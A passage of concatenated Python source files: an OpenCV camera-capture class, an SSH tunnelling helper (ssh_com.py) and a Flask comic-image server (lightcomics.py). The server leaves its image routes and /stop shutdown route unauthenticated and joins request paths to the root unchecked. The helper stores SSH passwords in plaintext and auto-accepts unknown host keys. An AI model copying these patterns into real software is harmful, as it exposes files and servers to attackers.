self.cam = cv2.VideoCapture(self._camera_num, apiPreference=cv2.CAP_V4L2)
else:
self.cam = cv2.VideoCapture(self._camera_num, apiPreference=cv2.CAP_ANY)
self.cam_open = self.cam.isOpened()
if self.cam_open:
# Apply settings to camera
self.height = self._camera_res[1] # image resolution
self.width = self._camera_res[0] # image resolution
self.exposure = self._exposure # camera exposure
self.autoexposure = self._autoexposure # autoexposure
self.fps = self._framerate # desired fps
self.buffersize = self._buffersize # camera driver buffer size
self.fourcc = self._fourcc # camera sensor encoding format
# Update records
self._camera_res = self.resolution
self._exposure = self.exposure
self._buffersize = self.buffersize
self._framerate = self.fps
self._autoexposure = self.autoexposure
self._fourcc = self.fourcc
self._fourcc_str = self.decode_fourcc(self._fourcc)
else:
if not self.log.full(): self.log.put_nowait((logging.CRITICAL, "CV2:Failed to open camera!"))
# Camera routines #################################################
# Reading and setting camera options
###################################################################
@property
def width(self):
""" returns video capture width """
if self.cam_open:
return int(self.cam.get(cv2.CAP_PROP_FRAME_WIDTH))
else: return -1
@width.setter
def width(self, val):
""" sets video capture width """
if (val is None) or (val == -1):
if not self.log.full(): self.log.put_nowait((logging.WARNING, "CV2:Width not changed to {}".format(val)))
return
if self.cam_open and val > 0:
with self.cam_lock:
if self.cam.set(cv2.CAP_PROP_FRAME_WIDTH, val):
# self._camera_res = (int(self.cam.get(cv2.CAP_PROP_FRAME_WIDTH)), int(self._camera_res[1]))
# HEIGHT and WIDTH only valid if both were set
if not self.log.full(): self.log.put_nowait((logging.INFO, "CV2:Width:{}".format(val)))
else:
if not self.log.full(): self.log.put_nowait((logging.ERROR, "CV2:Failed to set width to {}".format(val)))
else:
if not self.log.full(): self.log.put_nowait((logging.CRITICAL, "CV2:Failed to set width, camera not open!"))
@property
def height(self):
""" returns videocapture height """
if self.cam_open:
return int(self.cam.get(cv2.CAP_PROP_FRAME_HEIGHT))
else: return -1
@height.setter
def height(self, val):
""" sets video capture height """
if (val is None) or (val == -1):
if not self.log.full(): self.log.put_nowait((logging.WARNING, "CV2:Height not changed:{}".format(val)))
return
if self.cam_open and val > 0:
with self.cam_lock:
if self.cam.set(cv2.CAP_PROP_FRAME_HEIGHT, int(val)):
# self._camera_res = (int(self._camera_res[0]), int(self.cam.get(cv2.CAP_PROP_FRAME_HEIGHT)))
# HEIGHT and WIDTH only valid if both were set
if not self.log.full(): self.log.put_nowait((logging.INFO, "CV2:Height:{}".format(val)))
else:
if not self.log.full(): self.log.put_nowait((logging.ERROR, "CV2:Failed to set height to {}".format(val)))
else:
if not self.log.full(): self.log.put_nowait((logging.CRITICAL, "CV2:Failed to set height, camera not open!"))
@property
def resolution(self):
""" returns current resolution width x height """
if self.cam_open:
return (int(self.cam.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(self.cam.get(cv2.CAP_PROP_FRAME_HEIGHT)))
else: return (-1, -1)
@resolution.setter
def resolution(self, val):
if val is None: return
if self.cam_open:
if len(val) > 1: # have width x height
self.width = int(val[0])
self.height = int(val[1])
else: # given only one value for resolution
self.width = int(val)
self.height = int(val)
self._camera_res = (int(self.cam.get(cv2.CAP_PROP_FRAME_WIDTH)), int(self.cam.get(cv2.CAP_PROP_FRAME_HEIGHT)))
else: # camera not open
if not self.log.full(): self.log.put_nowait((logging.CRITICAL, "CV2:Failed to set resolution, camera not open!"))
@property
def exposure(self):
""" returns curent exposure """
if self.cam_open:
return self.cam.get(cv2.CAP_PROP_EXPOSURE)
else: return float("NaN")
@exposure.setter
def exposure(self, val):
""" # sets current exposure """
if (val is None):
if not self.log.full(): self.log.put_nowait((logging.WARNING, "CV2:Skipping set exposure to {}".format(val)))
return
if self.cam_open:
with self.cam_lock:
if self.cam.set(cv2.CAP_PROP_EXPOSURE, val):
self._exposure = self.cam.get(cv2.CAP_PROP_EXPOSURE)
if not self.log.full(): self.log.put_nowait((logging.INFO, "CV2:Exposure:{}".format(self.exposure)))
else:
if not self.log.full(): self.log.put_nowait((logging.ERROR, "CV2:Failed to set exposure to:{}".format(val)))
else:
if not self.log.full(): self.log.put_nowait((logging.CRITICAL, "CV2:Failed to set exposure, camera not open!"))
@property
def autoexposure(self):
""" returns curent exposure """
if self.cam_open:
return int(self.cam.get(cv2.CAP_PROP_AUTO_EXPOSURE))
else: return -1
@autoexposure.setter
def autoexposure(self, val):
""" sets autoexposure """
if (val is None):
if not self.log.full(): self.log.put_nowait((logging.WARNING, "CV2:Skipping set autoexposure to:{}".format(val)))
return
if self.cam_open:
with self.cam_lock:
if self.cam.set(cv2.CAP_PROP_AUTO_EXPOSURE, val):
self._autoexposure = self.cam.get(cv2.CAP_PROP_AUTO_EXPOSURE)
if not self.log.full(): self.log.put_nowait((logging.INFO, "CV2:Autoexposure:{}".format(self.autoexposure)))
else:
if not self.log.full(): self.log.put_nowait((logging.ERROR, "CV2:Failed to set Autoexposure to:{}".format(val)))
else:
if not self.log.full(): self.log.put_nowait((logging.CRITICAL, "CV2:Failed to set auto exposure, camera not open!"))
@property
def fps(self):
""" returns current frames per second setting """
if self.cam_open:
return self.cam.get(cv2.CAP_PROP_FPS)
else: return float("NaN")
@fps.setter
def fps(self, val):
""" set frames per second in camera """
if (val is None) or (val == -1):
if not self.log.full(): self.log.put_nowait((logging.WARNING, "CV2:Skipping set framerate to:{}".format(val)))
return
if self.cam_open:
with self.cam_lock:
if self.cam.set(cv2.CAP_PROP_FPS, val):
self._framerate = self.cam.get(cv2.CAP_PROP_FPS)
if not self.log.full(): self.log.put_nowait((logging.INFO, "CV2:FPS:{}".format(self.fps)))
else:
if not self.log.full(): self.log.put_nowait((logging.ERROR, "CV2:Failed to set FPS to:{}".format(val)))
else:
if not self.log.full(): self.log.put_nowait((logging.CRITICAL, "CV2:Failed to set framerate, camera not open!"))
@staticmethod
def decode_fourcc(val):
""" decode the fourcc integer to the chracter string """
return "".join([chr((int(val) >> 8 * i) & 0xFF) for i in range(4)])
@property
def fourcc(self):
""" return video encoding format """
if self.cam_open:
return int(self.cam.get(cv2.CAP_PROP_FOURCC))
else: return "None"
@fourcc.setter
def fourcc(self, val):
""" set video encoding format in camera """
if (val is None) or (val == -1):
if not self.log.full(): self.log.put_nowait((logging.WARNING, "CV2:Skipping set FOURCC to:{}".format(val)))
return
if self.cam_open:
if isinstance(val, str): # fourcc is a string
with self.cam_lock:
if self.cam.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(val[0],val[1],val[2],val[3])):
self._fourcc = self.cam.get(cv2.CAP_PROP_FOURCC)
self._fourcc_str = self.decode_fourcc(self._fourcc)
if not self.log.full(): self.log.put_nowait((logging.INFO, "CV2:FOURCC:{}".format(self._fourcc_str)))
else:
if not self.log.full(): self.log.put_nowait((logging.ERROR, "CV2:Failed to set FOURCC to:{}".format(val)))
else: # fourcc is integer/long
with self.cam_lock:
if self.cam.set(cv2.CAP_PROP_FOURCC, val):
self._fourcc = int(self.cam.get(cv2.CAP_PROP_FOURCC))
self._fourcc_str = self.decode_fourcc(self._fourcc)
if not self.log.full(): self.log.put_nowait((logging.INFO, "CV2:FOURCC:{}".format(self._fourcc_str)))
else:
if not self.log.full(): self.log.put_nowait((logging.ERROR, "CV2:Failed to set FOURCC to:{}".format(val)))
else:
if not self.log.full(): self.log.put_nowait((logging.CRITICAL, "CV2:Failed to set fourcc, camera not open!"))
@property
def buffersize(self):
""" return opencv camera buffersize """
if self.cam_open:
return int(self.cam.get(cv2.CAP_PROP_BUFFERSIZE))
else: return float("NaN")
@buffersize.setter
def buffersize(self, val):
""" set opencv camera buffersize """
if val is None or val < 0:
if not self.log.full(): self.log.put_nowait((logging.WARNING, "CV2:Skipping set buffer size to:{}".format(val)))
return
if self.cam_open:
with self.cam_lock:
if self.cam.set(cv2.CAP_PROP_BUFFERSIZE, val):
if not self.log.full(): self.log.put_nowait((logging.INFO, "CV2:Buffersize:{}".format(val)))
self._buffersize = int(self.cam.get(cv2.CAP_PROP_BUFFERSIZE))
else:
if not self.log.full(): self.log.put_nowait((logging.ERROR, "CV2:Failed to set buffer size to:{}".format(val)))
else:
if not self.log.full(): self.log.put_nowait((logging.CRITICAL, "CV2:Failed to set buffersize, camera not open!"))
###############################################################################
# Testing
###############################################################################
if __name__ == '__main__':
configs = {
'camera_res' : (1280, 720 ), # width & height
'exposure' : -2, # -1,0 = auto, 1...max=frame interval,
'autoexposure' : 1, # depends on camera: 0.25 or 0.75(auto) or 1(auto), -1, 0
'fps' : 30, # 15, 30, 40, 90, 120, 180
'fourcc' : -1, # n.a.
'buffersize' : -1, # n.a.
'output_res' : (-1, -1), # Output resolution, -1,-1 no change
'flip' : 0, # 0=no rotation
# 1=ccw90deg
# 2=rotation180
# 3=cw90
# 4=horizontal
# 5=upright diagonal flip
# 6=vertical
# 7=upper-left diagonal flip
'displayfps' : 30 # frame rate for display server
}
if configs['displayfps'] >= configs['fps']: display_interval = 0
else: display_interval = 1.0/configs['displayfps']
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger("Capture")
logger.log(logging.DEBUG, "Starting Capture")
camera = cv2Capture(configs,camera_num=0)
camera.start()
logger.log(logging.DEBUG, "Getting Frames")
window_handle = cv2.namedWindow("Camera", cv2.WINDOW_AUTOSIZE)
last_display = time.perf_counter()
stop = False
while(not stop):
current_time = time.perf_counter()
while not camera.log.empty():
(level, msg) = camera.log.get_nowait()
logger.log(level, "{}".format(msg))
(frame_time, frame) = camera.capture.get(block=True, timeout=None)
if (current_time - last_display) >= display_interval:
cv2.imshow('Camera', frame)
last_display = current_time
if cv2.waitKey(1) & 0xFF == ord('q'): stop=True
#try:
# if cv2.getWindowProperty(window_name, cv2.WND_PROP_AUTOSIZE) < 0:
# stop = True
#except:
# stop = True
camera.stop()
cv2.destroyAllWindows()
|
ssh_com.py
|
import logging
import signal
import platform
import paramiko
import json
import os
from pathlib import Path
import subprocess
import threading
import zmq.ssh
class SSHCom:
def __init__(self, worker_exec=None, local_server_id=None, remote_server_id=None,
ssh_local_ip=None, ssh_local_username=None, ssh_local_password=None):
if worker_exec is not None:
self.local_server_id = local_server_id
self.remote_server_id = remote_server_id
self.worker_exec = worker_exec
self.local_server_info = self.get_ssh_server_info(self.local_server_id)
self.remote_server_info = self.get_ssh_server_info(self.remote_server_id)
if ssh_local_ip is not None:
self.ssh_local_ip = ssh_local_ip
self.ssh_local_username = ssh_local_username
self.ssh_local_password = ssh_local_password
self.client = None
self.setup_client()
self.stdout = None
self.stderr = None
self.tunnelling_processes_pids = []
def setup_client(self):
try:
self.client = paramiko.SSHClient()
self.client.load_host_keys(os.path.expanduser('~/.ssh/known_hosts'))
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
except Exception as e:
print('Starting paramiko client failed with error {}'.format(e))
@staticmethod
def get_ssh_server_info(id):
"""
Reads the ssh_info.json file and returns the dictionary that has the info for the ssh server with the given id
:param id: A string of an int that represents the unique id of the ssh_info.json server entry
:return: The dict that carries the info of the specified server (IP, port, username and password)
"""
ssh_info_file = os.path.join(Path(os.path.dirname(os.path.realpath(__file__))), 'ssh_info.json')
with open(ssh_info_file) as f:
ssh_info = json.load(f)
result = {}
if id != 'None':
result = ssh_info[id]
else:
result['IP'] = result['Port'] = result['username'] = result['password'] = 'None'
return result
def connect_socket_to_local(self, socket, socket_ip, socket_port, skip_ssh=False):
"""
Connects a socket to an IP and a port at the computer that is running the editor (local). It has three possible
behaviours:
1) If the node hasn't been set up as a remote node (i.e. has not been given the ip addresses for an SSH remote
and an SSH local server) then the worker function runs locally and the socket is connected to the local ip
(probably 127.0.0.1) and the correct port for the job.
2) If the node is a remote running node (i.e. has ip addresses for the SSH remote and SSH local servers) then
it has two possible behaviours:
2a) If there is no local SSH running (denoted by the password of the local SSH server being None) then
the socket is connected ("normally") to the ip address of the local computer (i.e. the ip address of the
local SSH server given on the node's extra info) and the corresponding port for the job.
2b) If there is a local SSH server actually running (there is a password associated with it in the SSH
info page of the editor) then the socket is connected through an ssh tunnel
:param socket: The socket to connect
:param socket_ip: The localhost ip address used by Heron (probably 127.0.0.1)
:param socket_port: The port to connect to
:param skip_ssh: If true then the connection doesn't use an ssh tunnel even if there is an SSH server running
locally. This is used for the case of sockets that do proof of life (and connect to the local proof of life
forwarder).
:return: Nothing
"""
if self.ssh_local_ip == 'None':
socket.connect("{}:{}".format(socket_ip, socket_port))
else:
logging.debug('== Connecting back to local (computer running editor) with port : {}'.format(socket_port))
try:
if self.ssh_local_password == 'None' or skip_ssh:
logging.debug('=== Using normal sockets (not SSH) connecting to tcp://{}:{}'
.format(self.ssh_local_ip, socket_port))
socket.connect(r"tcp://{}:{}".format(self.ssh_local_ip, socket_port))
else:
logging.debug('=== Using SSH connecting to {} -> {}:{}'.
format(self.ssh_local_ip, socket_ip, socket_port))
tunneling_process = zmq.ssh.tunnel_connection(socket, '{}:{}'.format(socket_ip, socket_port),
"{}@{}".format(self.ssh_local_username,
self.ssh_local_ip),
password=self.ssh_local_password,
paramiko=True)
logging.debug('PID of generated tunneling process = {}'.format(tunneling_process.pid))
self.tunnelling_processes_pids.append(tunneling_process.pid)
except Exception as e:
logging.debug("=== Failed to connect with error: {}".format(e))
finally:
logging.debug('=== Connected')
def connect_socket_to_remote(self, socket, socket_ip):
if self.remote_server_id != 'None':
logging.debug('ssh remote with port : {}'.format(socket_ip))
tunnelling_pid = zmq.ssh.tunnel_connection(socket, socket_ip, "{}@{}".
format(self.remote_server_info['username'],
self.remote_server_info['IP']),
password=self.remote_server_info['password'],
paramiko=True)
logging.debug(tunnelling_pid)
self.tunnelling_processes_pids.append(tunnelling_pid.pid)
def add_local_server_info_to_arguments(self, arguments_list):
arguments_list.append(self.local_server_info['IP'])
arguments_list.append(self.local_server_info['username'])
arguments_list.append(self.local_server_info['password'])
return arguments_list
def list_to_string(self, args):
""" Join the arguments into a single space-separated command string """
return ' '.join(str(arg) for arg in args)
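# Example (illustrative values): list_to_string(['python', 'worker.py', '--port', 5555])
# returns 'python worker.py --port 5555', the form passed to exec_command below.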
def remote_stderr_thread(self):
for line in self.stderr:
print('// REMOTE COMPUTER {} ERROR: {}'.format(self.remote_server_info['IP'], line))
def remote_stdout_thread(self):
for line in self.stdout:
print('// REMOTE COMPUTER {} SAYS: {}'.format(self.remote_server_info['IP'], line))
def start_process(self, arguments_list):
if self.remote_server_id == 'None':
if len(arguments_list[0].split(' ')) > 1:
new_arguments_list = arguments_list[0].split(' ')
for i in range(1, len(arguments_list)):
new_arguments_list.append(arguments_list[i])
else:
new_arguments_list = arguments_list
return subprocess.Popen(new_arguments_list, creationflags=subprocess.CREATE_NEW_PROCESS_GROUP).pid
else:
self.client.connect(self.remote_server_info['IP'],
int(self.remote_server_info['Port']),
self.remote_server_info['username'],
self.remote_server_info['password'])
stdin, self.stdout, self.stderr = self.client.exec_command(self.list_to_string(arguments_list))
stderr_thread = threading.Thread(target=self.remote_stderr_thread, daemon=True)
stdout_thread = threading.Thread(target=self.remote_stdout_thread, daemon=True)
stderr_thread.start()
stdout_thread.start()
return 'Remote unknown pid'
def kill_tunneling_processes(self):
logging.debug('KILLING THE PROCESSES {}'.format(self.tunnelling_processes_pids))
if platform.system() == 'Windows':
signal_to_send = signal.SIGBREAK
else: # Linux, macOS and other POSIX platforms
signal_to_send = signal.SIGTERM
for pid in self.tunnelling_processes_pids:
os.kill(pid, signal_to_send)
pid = os.getpid()
os.kill(pid, signal_to_send)
|
lightcomics.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import time
import datetime
import json
import zipfile
import struct
import imghdr
import platform
import logging
import chardet
import flask
import re
import socket
import threading
import requests
from flask import request
from PIL import Image
from io import BytesIO
from werkzeug.routing import BaseConverter
from functools import wraps
from io import StringIO
import tkinter as tk
from tkinter import filedialog
from tkinter import messagebox
from urllib.request import urlopen
from urllib.parse import unquote
import importlib.util
RAR_FILE_SPEC = importlib.util.find_spec("rarfile")
IS_INSTALLED_RAR_FILE_MODULE = RAR_FILE_SPEC is not None
if IS_INSTALLED_RAR_FILE_MODULE:
import rarfile
# Version
__version__ = (1, 0, 3)
# Settings
EXTENSIONS_ALLOW_IMAGE = ['JPG', 'GIF', 'PNG', 'TIF', 'BMP', 'JPEG', 'TIFF']
EXTENSIONS_ALLOW_ARCHIVE = ['ZIP', 'CBZ']
if IS_INSTALLED_RAR_FILE_MODULE:
EXTENSIONS_ALLOW_ARCHIVE = EXTENSIONS_ALLOW_ARCHIVE + ['RAR', 'CBR']
EXTENSIONS_ALLOW = EXTENSIONS_ALLOW_IMAGE + EXTENSIONS_ALLOW_ARCHIVE
# Logger setup
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
# Operating system flags
IS_OS_WINDOWS = sys.platform == 'win32'
IS_OS_MACOSX = sys.platform == 'darwin'
IS_OS_LINUX = sys.platform == 'linux'
# Configuration
DEFAULT_PORT = 12370
CONF_ROOT_PATH = ""
CONF_SERVER_PORT = DEFAULT_PORT
CONF_PASSWORD = ""
CONF_HOST = "0.0.0.0"
BASE_MIME_TYPE = "application/json"
if IS_OS_WINDOWS:
CONF_ROOT_PATH = "c:/"
CONF_SERVER_PORT = DEFAULT_PORT
CONF_PASSWORD = ""
elif IS_OS_MACOSX:
CONF_ROOT_PATH = "/"
CONF_SERVER_PORT = DEFAULT_PORT
CONF_PASSWORD = ""
elif IS_OS_LINUX:
CONF = json.loads(open('./lightcomics.json', 'r').read())
CONF_ROOT_PATH = CONF['ROOT']
CONF_SERVER_PORT = CONF['PORT']
CONF_PASSWORD = CONF['PASSWORD']
CONF_HOST = CONF['HOST']
if not os.path.exists(CONF_ROOT_PATH):
print("루트 디렉토리를 찾을 수 없습니다. lightcomics.json 파일의 ROOT 경로를 확인해주세요.")
exit(0)
else:
print("운영체제를 확인할 수 없습니다.")
exit(0)
# Flask app
app = flask.Flask(__name__)
# Credential check
def authention_validate(username, password):
return username == 'LightComics' and password == CONF_PASSWORD
# Return an authentication error
def authenticate():
return flask.Response('You have to login with proper credentials', 401,
{'WWW-Authenticate': 'Basic realm="Login Required"'})
# Require authentication
def requires_authenticate(f):
@wraps(f)
def decorated(*args, **kwargs):
auth = flask.request.authorization
if not auth or not authention_validate(auth.username, auth.password):
return authenticate()
return f(*args, **kwargs)
return decorated
# JSON Encoder
class LightEncoder(json.JSONEncoder):
def default(self, o):
return o.__dict__
# Identifier model
class BaseIdentifierModel(LightEncoder):
def __init__(self):
self._path = ""
self._identifier = ""
# Image model
class BaseImageModel(LightEncoder):
def __init__(self):
self._name = ""
self._decode_name = ""
self._width = -1
self._height = -1
# Listing model
class BaseListingModel(LightEncoder):
def __init__(self):
self._root = CONF_ROOT_PATH
self._directories = []
self._archives = []
self._images = []
# Helper functions
def fix_str(str):
""" 깨진 문자열을 복원하여 반환한다 """
name = str
try:
name = name.encode('cp437').decode('cp949')
except UnicodeDecodeError:
name = name.encode('utf8')
encoding = chardet.detect(name)['encoding']
name = name.decode(encoding)
return name
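# Note: archives created on Korean Windows typically store member names as CP949 bytes that
# zipfile decodes as CP437, so the name is re-encoded to CP437 and decoded as CP949 here,
# with a chardet-based guess as the fallback.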
def get_image_size_from_bytes(head):
""" 이미지 사이즈를 반환한다 """
try:
im = Image.open(head)
return im.size
except ValueError:
return 0, 0
except TypeError:
return 0, 0
def is_hidden_or_trash(full_path):
""" 숨김 파일 또는 __MACOSX 디렉토리인지 확인한다. """
if 'DS_STORE' in full_path:
return True
elif '__MACOSX' in full_path:
return True
else:
return False
def get_extension(file_name):
""" 확장자를 반환한다. (숨김파일 또는 MACOSX파일의 경우 확장자를 반환하지 않는다.) """
extension = os.path.splitext(file_name)[-1]
if extension.startswith('.'):
extension = extension[1:]
if is_hidden_or_trash(extension):
return ''
return extension
def is_extensions_allow_image(file_name):
""" 허용된 이미지 확장자인 경우 True를 반환한다 """
extension = get_extension(file_name)
if extension.upper() not in EXTENSIONS_ALLOW_IMAGE:
return False
else:
return True
def is_extensions_allow_archive(file_name):
""" 허용된 압축파일 확장자인 경우 True를 반환한다 """
extension = get_extension(file_name)
if extension.upper() not in EXTENSIONS_ALLOW_ARCHIVE:
return False
else:
return True
def get_imagemodel_in_dir(dir_path, mode):
""" 디렉토리의(dir_path)의 이미지파일의 name, width, height를 모아서 반환한다."""
image_models = []
for name in os.listdir(dir_path):
if is_extensions_allow_image(name):
model = BaseImageModel()
model._name = os.path.join(dir_path, name).replace("\\", "/")
if mode == "1":
with open(model._name, mode='rb') as f:
data = BytesIO()
data.write(f.read())
data.seek(0)
size = get_image_size_from_bytes(data)
model._width = size[0]
model._height = size[1]
image_models.append(model)
return image_models
def get_imagemodel_in_zip(zip_path, mode):
""" 압축파일(zip_path)의 이미지파일의 name, width, height를 모아서 반환한다."""
image_models = []
with zipfile.ZipFile(zip_path) as zf:
for name in zf.namelist():
if is_hidden_or_trash(name):
continue
if is_extensions_allow_image(name):
model = BaseImageModel()
model._name = name
model._decode_name = fix_str(name)
if mode == "1":
with zf.open(name) as f:
data = BytesIO()
data.write(f.read())
data.seek(0)
size = get_image_size_from_bytes(data)
model._width = size[0]
model._height = size[1]
image_models.append(model)
return image_models
def get_imagemodel_in_rar(rar_path, mode):
""" 압축파일(rar_path)의 이미지파일의 name, width, height를 모아서 반환한다."""
image_models = []
with rarfile.RarFile(rar_path) as rf:
for name in rf.namelist():
if is_hidden_or_trash(name):
continue
if is_extensions_allow_image(name):
model = BaseImageModel()
model._name = name
app.logger.info("fileName: " + name)
if mode == "1":
try:
with rf.open(name) as f:
data = BytesIO()
data.write(f.read())
data.seek(0)
size = get_image_size_from_bytes(data)
model._width = size[0]
model._height = size[1]
except Exception:
app.logger.error("Can not getting width, height >> " + name)
image_models.append(model)
return image_models
def get_image_data_in_dir(file_path):
""" 이미지 파일(file_path)의 데이터를 반환한다. """
with open(file_path, mode='rb') as f:
data = BytesIO()
data.write(f.read())
data.seek(0)
return data
def get_image_data_in_zip(zip_path, file_path):
""" 압축 파일(zip_path)에서 이미지 파일(file_path)의 데이터를 반환한다. """
with zipfile.ZipFile(zip_path) as zf:
for name in zf.namelist():
if name == file_path and is_extensions_allow_image(name):
with zf.open(name) as f:
data = BytesIO()
data.write(f.read())
data.seek(0)
return data
def get_image_data_in_rar(rar_path, file_path):
""" 압축 파일(rar_path)에서 이미지 파일(file_path)의 데이터를 반환한다. """
with rarfile.RarFile(rar_path) as rf:
for name in rf.namelist():
if name == file_path and is_extensions_allow_image(name):
try:
with rf.open(name) as f:
data = BytesIO()
data.write(f.read())
data.seek(0)
return data
except Exception:
app.logger.error("Canot open fileName: " + name)
def get_listing_model(path):
""" 리스팅 """
listing_model = BaseListingModel()
for name in os.listdir(path):
full_path = os.path.join(path, name).replace("\\", "/")
if os.path.isdir(full_path):
listing_model._directories.append(full_path)
elif is_extensions_allow_archive(full_path):
listing_model._archives.append(full_path)
elif is_extensions_allow_image(full_path):
listing_model._images.append(full_path)
else:
app.logger.info(name + " ignore")
return listing_model
def get_unique_identifier(path):
""" path에 해당하는 고유값을 생성하여 반환한다 """
path = remove_trail_slash(path)
createdate = int(os.stat(path).st_ctime)
filesize = int(get_size_of(path))
app.logger.info("createdate: " + str(createdate))
app.logger.info("filesize: " + str(filesize))
unique_identifier = str(createdate + filesize)
app.logger.info(unique_identifier)
return unique_identifier
def get_real_path(base, abs_path):
""" 실제 경로를 반환한다 """
abs_path = unquote(abs_path)
if abs_path == "":
return base
real_path = os.path.join(base, abs_path).replace("\\", "/")
return real_path
def remove_trail_slash(s):
""" 마지막 slash를 제거한다 """
if s.endswith('/'):
s = s[:-1]
return s
def get_size_of(path):
""" 해당 경로 파일 또는 디렉토리의 사이즈를 구하여 반환한다 """
total_size = os.path.getsize(path)
if os.path.isdir(path) == False:
return total_size
for item in os.listdir(path):
itempath = os.path.join(path, item).replace("\\", "/")
if os.path.isfile(itempath):
total_size += os.path.getsize(itempath)
elif os.path.isdir(itempath):
total_size += get_size_of(itempath)
return total_size
# Flask route mappings
@app.route('/')
@requires_authenticate
def root():
"""
Listing
localhost:12370/
"""
app.logger.info("@app.route('/')")
return rest_listing("")
@app.route('/<path:req_path>/')
@requires_authenticate
def rest_listing(req_path):
"""
Listing
localhost:12370/req_path/
"""
app.logger.info("@app.route('/<path:req_path>/')")
base_path = get_real_path(CONF_ROOT_PATH, "")
full_path = "%s" % unquote(req_path)
full_real_path = get_real_path(base_path, full_path)
full_real_path = os.path.join(full_real_path, "").replace("\\", "/")
app.logger.info(full_real_path)
model = get_listing_model(full_real_path)
data = json.dumps(model, indent=4, cls=LightEncoder)
response = flask.Response(data, headers=None, mimetype=BASE_MIME_TYPE)
return response
@app.route('/<string:archive>.<string:archive_ext>/')
@requires_authenticate
def rest_load_image_model(archive, archive_ext):
"""
Image info inside an archive file
localhost:12370/sample.zip/
"""
app.logger.info("@app.route('/<string:archive>.<string:archive_ext>/')")
return rest_load_image_model2("", archive, archive_ext)
@app.route('/<path:req_path>/<string:archive>.<string:archive_ext>/')
@requires_authenticate
def rest_load_image_model2(req_path, archive, archive_ext):
"""
Image info inside an archive file
localhost:12370/dir/sglee/sample.zip/
"""
app.logger.info(
"@app.route('/<path:req_path>/<string:archive>.<string:archive_ext>/')"
)
base_path = get_real_path(CONF_ROOT_PATH, "")
full_path = "%s" % unquote(req_path)
full_real_path = get_real_path(base_path, full_path)
full_real_path = os.path.join(full_real_path, "").replace("\\", "/")
app.logger.info(full_real_path)
archive_name = "%s" % unquote(archive) + "." + archive_ext
archive_path = os.path.join(full_real_path,
archive_name).replace("\\", "/")
app.logger.info(archive_path)
mode = request.args.get('mode', "0")
app.logger.info("mode: " + mode)
if archive_ext.upper() == 'ZIP' or archive_ext.upper() == 'CBZ':
models = get_imagemodel_in_zip(archive_path, mode)
data = json.dumps(models, indent=4, cls=LightEncoder)
response = flask.Response(data,
headers=None,
mimetype=BASE_MIME_TYPE)
return response
elif archive_ext.upper() == 'RAR' or archive_ext.upper() == 'CBR':
models = get_imagemodel_in_rar(archive_path, mode)
data = json.dumps(models, indent=4, cls=LightEncoder)
response = flask.Response(
data, headers=None, mimetype=BASE_MIME_TYPE)
return response
return ('', 204)
@app.route('/<string:archive>.<string:archive_ext>/<path:img_path>')
def rest_load_image_data(archive, archive_ext, img_path):
"""
Return image data from inside an archive file
localhost:12370/sample.zip/img1.jpg
localhost:12370/sample.zip/test/img1.jpg
"""
app.logger.info(
"@app.route('/<string:archive>.<string:archive_ext>/<path:img_path>')")
return rest_load_image_data2("", archive, archive_ext, img_path)
@app.route(
'/<path:req_path>/<string:archive>.<string:archive_ext>/<path:img_path>')
def rest_load_image_data2(req_path, archive, archive_ext, img_path):
"""
Return image data from inside an archive file
localhost:12370/dir/sglee/sample.zip/img1.jpg
localhost:12370/dir/sglee/sample.zip/test/img1.jpg
"""
app.logger.info(
"@app.route('/<path:req_path>/<string:archive>.<string:archive_ext>/<path:img_path>')"
)
base_path = get_real_path(CONF_ROOT_PATH, "")
full_path = "%s" % unquote(req_path)
full_real_path = get_real_path(base_path, full_path)
full_real_path = os.path.join(full_real_path, "").replace("\\", "/")
app.logger.info(full_real_path)
archive_name = "%s" % unquote(archive) + "." + archive_ext
archive_path = os.path.join(full_real_path,
archive_name).replace("\\", "/")
app.logger.info(archive_path)
img_path = unquote(img_path)
app.logger.info(img_path)
if archive_ext.upper() == 'ZIP' or archive_ext.upper() == 'CBZ':
img = get_image_data_in_zip(archive_path, img_path)
return flask.send_file(img,
attachment_filename=os.path.basename(img_path),
as_attachment=True)
if archive_ext.upper() == 'RAR' or archive_ext.upper() == 'CBR':
img = get_image_data_in_rar(archive_path, img_path)
return flask.send_file(img,
attachment_filename=os.path.basename(img_path),
as_attachment=True)
return ('', 204)
@app.route('/id/<path:req_path>')
@requires_authenticate
def rest_get_identifier(req_path):
"""
Return the file identifier for the given path.
localhost:12370/dir/hello.zip
"""
app.logger.info("@app.route('/id/<path:req_path>')")
base_path = get_real_path(CONF_ROOT_PATH, "")
full_path = "%s" % unquote(req_path)
full_real_path = get_real_path(base_path, full_path)
full_real_path = os.path.join(full_real_path, "").replace("\\", "/")
app.logger.info(full_real_path)
model = BaseIdentifierModel()
model._path = remove_trail_slash(full_real_path)
model._identifier = get_unique_identifier(full_real_path)
data = json.dumps(model, indent=4, cls=LightEncoder)
response = flask.Response(data, headers=None, mimetype=BASE_MIME_TYPE)
return response
@app.route('/stop')
def rest_stop_server_by_request():
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
app.logger.info("shutdown...")
func()
return ('Server shutting down...', 200)
# UI implementation for Windows or macOS
server_run = False
def on_click_server_state():
global server_run
global server_state_label
global server_on_off_button
if server_run == True:
shutdown_server()
server_state_label['text'] = "Server: stopped"
server_on_off_button['text'] = " Start "
server_port_textbox.configure(state="normal")
password_textbox.configure(state="normal")
else:
update_server_port()
update_password()
server_threading = threading.Thread(target=start_server)
server_threading.start()
server_state_label['text'] = "Server: running"
server_on_off_button['text'] = " Stop "
server_port_textbox.configure(state="disabled")
password_textbox.configure(state="disabled")
server_run = not server_run
def start_server():
app.logger.info("Server Start: " + str(CONF_SERVER_PORT))
host = local_ip.get()
if IS_OS_MACOSX:
host = "0.0.0.0" # check after
app.run(host=host, port=CONF_SERVER_PORT)
def shutdown_server():
URL = "http://" + CONF_HOST + ":" + str(CONF_SERVER_PORT) + "/stop"
requests.get(URL)
app.logger.info("Sever Stopped")
def get_public_ip():
data = str(urlopen('http://checkip.dyndns.com/').read())
return re.compile(r'Address: (\d+\.\d+\.\d+\.\d+)').search(data).group(1)
def update_server_ip():
global CONF_HOST
app.logger.info(get_public_ip())
CONF_HOST = socket.gethostbyname(socket.gethostname())
